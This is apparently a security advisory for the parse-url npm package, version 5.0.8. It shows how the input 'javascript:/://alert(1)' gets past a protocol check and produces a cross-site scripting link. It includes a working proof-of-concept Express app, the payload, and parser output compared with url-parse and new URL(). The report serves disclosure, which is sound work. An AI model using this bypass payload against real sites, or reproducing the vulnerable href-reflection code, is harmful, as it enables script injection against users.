Description

The parse-url The 5.0.8 version of the parser does not check :// character between protocols. This causes spoofing of the javascript protocol itself. Additionally, protocol spoofing does not occur in url-parse, new URL(), and url.parse() other than parse-url.

Proof of Concept

const parseUrl = require("parse-url");
const express = require('express');
const app = express();

parsed = parseUrl("javascript:/://alert(1)");
console.log(parsed);

app.get('/', (req, res) => {
    if (parsed.protocol !== "javascript") {
        res.send("<a href=\'" + parsed.href + "\'>CLICK ME!</a>")
    }
})

app.listen(9999);

In general, the above express code forbids the javascript protocol. However, you can spoof this using the :// character

output console.log(parsed);
{
  protocols: [ 'javascript:/' ],
  protocol: 'javascript:/',
  port: null,
  resource: 'alert(1)',
  user: '',
  pathname: '',
  hash: '',
  search: '',
  href: 'javascript:/://alert(1)',
  query: [Object: null prototype] {}
}

output : document in browser
<a href="javascript:/://alert(1)">CLICK ME!</a>

Other module stability

~/Desktop/npm-research/test
❯ node -e "const parser = require('url-parse');console.log(parser('javascript:/://alert()'))"
{
  slashes: false,
  protocol: 'javascript:',
  hash: '',
  query: '',
  pathname: '/://alert()',
  auth: '',
  host: '',
  port: '',
  hostname: '',
  password: '',
  username: '',
  origin: 'null',
  href: 'javascript:/://alert()'
}

~/Desktop/npm-research/test
❯ node -e 'console.log(new URL("javascript:/://alert()"))'
URL {
  href: 'javascript:/://alert()',
  origin: 'null',
  protocol: 'javascript:',
  username: '',
  password: '',
  host: '',
  hostname: '',
  port: '',
  pathname: '/://alert()',
  search: '',
  searchParams: URLSearchParams {},
  hash: ''
}

In the two famous modules, javascript spoofing does not occur, so XSS does not occur.

Impact

Through this vulnerability, an attacker is capable to execute malicious scripts.